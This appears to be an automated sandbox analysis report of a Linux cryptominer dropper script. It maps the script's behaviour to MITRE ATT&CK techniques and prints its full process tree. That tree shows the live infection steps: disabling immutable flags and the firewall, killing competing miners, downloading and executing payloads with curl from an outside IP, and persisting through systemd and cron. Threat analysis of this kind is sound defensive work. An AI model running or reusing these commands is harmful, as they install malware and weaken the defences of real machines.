78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

execution persistence privilege_escalatio

description	ioc	Process
File opened for modification	/etc/ld.so.preload	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
945	chmod
956	chmod
964	chmod
916	chmod
940	chmod
928	chmod
951	chmod
966	chmod
910	chmod
923	chmod

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
711	iptables

Attempts to change immutable files 21 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
828	xargs
857	xargs
725	xargs
732	xargs
750	xargs
817	xargs
821	xargs
825	xargs
862	xargs
876	xargs
887	xargs
709	chattr
738	xargs
833	xargs
898	xargs
744	xargs
903	xargs
705	chattr
708	chattr
831	xargs
835	xargs

Creates/modifies Cron job 1 TTPs 19 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

Cron

persistence privilege_escalation

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.asa3Ff	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.AqolIp	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.n5tp60	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.SDJtsR	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.bvXCPn	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.0CLNhV	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.K3B81Q	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.yjKCL8	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.KncNNw	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ZZjXlN	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.6D1GBx	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.Tj5kWW	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.fWMC6V	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.5GkEul	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.GLgat8	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.LBvCHs	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ixXbQW	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.ubf1oh	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.eKPInk	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/bot.service	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

Checks CPU configuration 1 TTPs 4 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads CPU attributes 1 TTPs 44 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Process Discovery 1 TTPs 5 IoCs

Adversaries may try to discover information about running processes.

Process Discovery

T1057

pid	Process
853	ps
858	ps
899	ps
721	ps
813	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/42/status	pkill
File opened for reading	/proc/775/cmdline	ps
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/21/status	pkill
File opened for reading	/proc/149/status	ps
File opened for reading	/proc/726/status	pkill
File opened for reading	/proc/345/cmdline	ps
File opened for reading	/proc/27/status	ps
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/106/stat	ps
File opened for reading	/proc/318/status	pkill
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/222/status	pkill
File opened for reading	/proc/629/cmdline	pkill
File opened for reading	/proc/696/cmdline	pkill
File opened for reading	/proc/106/status	ps
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/167/cmdline	pkill
File opened for reading	/proc/315/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/77/status	pkill
File opened for reading	/proc/429/status	pkill
File opened for reading	/proc/295/status	pkill
File opened for reading	/proc/291/status	ps
File opened for reading	/proc/280/cmdline	pkill
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/98/cmdline	pkill
File opened for reading	/proc/222/cmdline	pkill
File opened for reading	/proc/18/cmdline	pkill
File opened for reading	/proc/291/cmdline	pkill
File opened for reading	/proc/27/cmdline	pkill
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/701/stat	ps
File opened for reading	/proc/723/stat	ps
File opened for reading	/proc/488/cmdline	pkill
File opened for reading	/proc/697/status	pkill
File opened for reading	/proc/13/status	pkill
File opened for reading	/proc/9/status	pkill
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/699/cmdline	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/150/stat	ps
File opened for reading	/proc/28/cmdline	pkill
File opened for reading	/proc/29/status	pkill
File opened for reading	/proc/108/status	pkill
File opened for reading	/proc/29/status	pkill
File opened for reading	/proc/167/cmdline	pkill
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/674/cmdline	ps
File opened for reading	/proc/668/cmdline	pkill
File opened for reading	/proc/775/status	pkill
File opened for reading	/proc/811/stat	ps
File opened for reading	/proc/109/status	pkill
File opened for reading	/proc/860/status	ps
File opened for reading	/proc/4/cmdline	pkill
File opened for reading	/proc/281/cmdline	pkill
File opened for reading	/proc/698/cmdline	pkill
File opened for reading	/proc/668/cmdline	pkill
File opened for reading	/proc/25/status	pkill

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

System Network Configuration Discovery

T1016

pid	Process
698	063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
- System Network Configuration Discovery
PID:698
- /usr/bin/chattr
  chattr -i /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:705
- /bin/rm
  rm -f /etc/ld.so.preload
  2⤵
  PID:707
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:708
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:709
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:711
- /usr/bin/id
  id -u
  2⤵
  PID:716
- /bin/ls
  ls -la /etc
  2⤵
  PID:718
- /bin/grep
  grep -e /dev
  2⤵
  PID:719
- /bin/grep
  grep -v grep
  2⤵
  PID:720
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:721
- /bin/grep
  grep agetty
  2⤵
  PID:722
- /bin/grep
  grep -v grep
  2⤵
  PID:723
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:724
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:725
- /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:726
- /bin/grep
  grep 207.38.87.6
  2⤵
  PID:728
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:729
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:730
- /bin/grep
  grep -v -
  2⤵
  PID:731
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:732
- /bin/grep
  grep 127.0.0.1:52018
  2⤵
  PID:734
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:735
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:736
- /bin/grep
  grep -v -
  2⤵
  PID:737
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:738
- /bin/grep
  grep 34.81.218.76:9486
  2⤵
  PID:740
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:741
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:742
- /bin/grep
  grep -v -
  2⤵
  PID:743
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:744
- /bin/grep
  grep 42.112.28.216:9486
  2⤵
  PID:746
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:747
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:748
- /bin/grep
  grep -v -
  2⤵
  PID:749
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:750
- /usr/bin/pkill
  pkill -f .git/kthreaddw
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:751
- /usr/bin/pkill
  pkill -f 80.211.206.105
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:752
- /usr/bin/pkill
  pkill -f 207.38.87.6
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:753
- /usr/bin/pkill
  pkill -f p8444
  2⤵
  - Reads CPU attributes
  PID:754
- /usr/bin/pkill
  pkill -f supportxmr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:757
- /usr/bin/pkill
  pkill -f monero
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:760
- /usr/bin/pkill
  pkill -f kthreaddi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:761
- /usr/bin/pkill
  pkill -f srv00
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:764
- /usr/bin/pkill
  pkill -f /tmp/.javae/javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:766
- /usr/bin/pkill
  pkill -f .javae
  2⤵
  - Reads CPU attributes
  PID:768
- /usr/bin/pkill
  pkill -f .syna
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:770
- /usr/bin/pkill
  pkill -f .main
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:772
- /usr/bin/pkill
  pkill -f xmm
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:777
- /usr/bin/pkill
  pkill -f solr.sh
  2⤵
  - Reads CPU attributes
  PID:779
- /usr/bin/pkill
  pkill -f /tmp/.solr/solrd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:781
- /usr/bin/pkill
  pkill -f /tmp/javac
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:783
- /usr/bin/pkill
  pkill -f /tmp/.go.sh
  2⤵
  - Reads CPU attributes
  PID:785
- /usr/bin/pkill
  pkill -f /tmp/.x/agetty
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:787
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  PID:789
- /usr/bin/pkill
  pkill -f c3pool
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:792
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/gitag-ssh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:793
- /usr/bin/pkill
  pkill -f /tmp/1
  2⤵
  - Reads CPU attributes
  PID:796
- /usr/bin/pkill
  pkill -f /tmp/okk.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:798
- /usr/bin/pkill
  pkill -f /tmp/gitaly
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:800
- /usr/bin/pkill
  pkill -f /tmp/.x/kworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:802
- /usr/bin/pkill
  pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:804
- /usr/bin/pkill
  pkill -f /tmp/.X11-unix/supervise
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:807
- /usr/bin/pkill
  pkill -f /tmp/.ssh/redis.sh
  2⤵
  - Reads CPU attributes
  PID:809
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:813
- /bin/grep
  grep ./udp
  2⤵
  PID:814
- /bin/grep
  grep -v grep
  2⤵
  PID:815
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:816
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:817
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:820
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:821
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:824
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:825
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:827
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:828
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:830
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:831
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:832
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:833
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:834
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:835
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:837
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:839
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:845
- /usr/bin/pkill
  pkill -f cruner
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:847
- /usr/bin/pkill
  pkill -f dbused
  2⤵
  - Reads CPU attributes
  PID:849
- /usr/bin/pkill
  pkill -f bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:850
- /usr/bin/pkill
  pkill -f meminitsrv
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:852
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:853
- /bin/grep
  grep ./oka
  2⤵
  PID:854
- /bin/grep
  grep -v grep
  2⤵
  PID:855
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:856
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:857
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:858
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:859
- /bin/grep
  grep -v grep
  2⤵
  PID:860
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:861
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:862
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:863
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:864
- /bin/grep
  grep -v bin
  2⤵
  PID:865
- /bin/grep
  grep -v "\\["
  2⤵
  PID:866
- /bin/grep
  grep -v "("
  2⤵
  PID:867
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:869
- /bin/grep
  grep -v proxymap
  2⤵
  PID:870
- /bin/grep
  grep -v postgres
  2⤵
  PID:872
- /bin/grep
  grep -v postgrey
  2⤵
  PID:873
- /bin/grep
  grep -v kinsing
  2⤵
  PID:874
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:875
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:876
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:877
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:878
- /bin/grep
  grep -v bin
  2⤵
  PID:879
- /bin/grep
  grep -v "\\["
  2⤵
  PID:880
- /bin/grep
  grep -v "("
  2⤵
  PID:881
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:882
- /bin/grep
  grep -v proxymap
  2⤵
  PID:883
- /bin/grep
  grep -v postgres
  2⤵
  PID:884
- /bin/grep
  grep -v postgrey
  2⤵
  PID:885
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:886
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:887
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:888
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:889
- /bin/grep
  grep -v bin
  2⤵
  PID:890
- /bin/grep
  grep -v "\\["
  2⤵
  PID:891
- /bin/grep
  grep -v "("
  2⤵
  PID:892
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:893
- /bin/grep
  grep -v proxymap
  2⤵
  PID:894
- /bin/grep
  grep -v postgres
  2⤵
  PID:895
- /bin/grep
  grep -v postgrey
  2⤵
  PID:896
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:897
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:898
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:899
- /bin/grep
  grep -v grep
  2⤵
  PID:900
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:901
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:903
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:902
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:906
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:907
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  - Checks CPU configuration
  PID:911
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:920
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:921
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /usr/bin/curl
  curl -o /etc/kinsing http://80.71.158.12/kinsing
  2⤵
  - Checks CPU configuration
  PID:924
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /usr/bin/md5sum
  md5sum /etc/kinsing
  2⤵
  PID:932
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:933
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:937
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:938
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  - Checks CPU configuration
  PID:941
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:945
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:949
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:950
- /bin/chmod
  chmod 777 /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /usr/bin/curl
  curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
  2⤵
  - Checks CPU configuration
  PID:953
- /bin/chmod
  chmod +x /etc/libsystem.so
  2⤵
  - File and Directory Permissions Modification
  PID:956
- /usr/bin/md5sum
  md5sum /etc/libsystem.so
  2⤵
  PID:960
- /usr/bin/awk
  awk "{ print \$1 }"
  2⤵
  PID:961
- /bin/rm
  rm -rf /tmp/kdevtmpfsi
  2⤵
  PID:963
- /bin/chmod
  chmod 777 /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /bin/chmod
  chmod +x /etc/kinsing
  2⤵
  - File and Directory Permissions Modification
  PID:966
- /etc/kinsing
  /etc/kinsing
  2⤵
  PID:967
- /usr/bin/id
  id -u
  2⤵
  PID:968
- /bin/systemctl
  systemctl enable bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:970
- /bin/systemctl
  systemctl start bot
  2⤵
  - Enumerates kernel/hardware configuration
  PID:972
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:975
- /bin/sed
  sed /base64/d
  2⤵
  PID:976
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:977
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:980
- /bin/sed
  sed /_cron/d
  2⤵
  PID:981
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:982
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:985
- /bin/sed
  sed /31.210.20.181/d
  2⤵
  PID:986
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:987
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:988
- /bin/sed
  sed /update.sh/d
  2⤵
  PID:989
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:990
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:991
- /bin/sed
  sed /logo4/d
  2⤵
  PID:992
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:993
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:994
- /bin/sed
  sed /logo9/d
  2⤵
  PID:995
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:996
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:997
- /bin/sed
  sed /logo0/d
  2⤵
  - Reads runtime system information
  PID:998
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:999
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1000
- /bin/sed
  sed /logo/d
  2⤵
  PID:1001
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1002
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1003
- /bin/sed
  sed /tor2web/d
  2⤵
  PID:1004
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1005
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1006
- /bin/sed
  sed /jpg/d
  2⤵
  PID:1007
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1008
- /bin/sed
  sed /png/d
  2⤵
  PID:1010
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1011
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1009
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1012
- /bin/sed
  sed /tmp/d
  2⤵
  PID:1013
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1014
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1015
- /bin/sed
  sed /zmreplchkr/d
  2⤵
  PID:1016
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1017
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1018
- /bin/sed
  sed /aliyun.one/d
  2⤵
  PID:1019
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1020
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1021
- /bin/sed
  sed /3.215.110.66.one/d
  2⤵
  PID:1022
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1023
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1024
- /bin/sed
  sed /pastebin/d
  2⤵
  PID:1025
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1026
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1027
- /bin/sed
  sed /onion/d
  2⤵
  PID:1028
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1029
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1030
- /bin/sed
  sed /lsd.systemten.org/d
  2⤵
  PID:1031
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1032
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1033
- /bin/sed
  sed /shuf/d
  2⤵
  PID:1034
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1035
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1036
- /bin/sed
  sed /ash/d
  2⤵
  PID:1037
- /usr/bin/crontab
  crontab -
  2⤵
  PID:1038

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking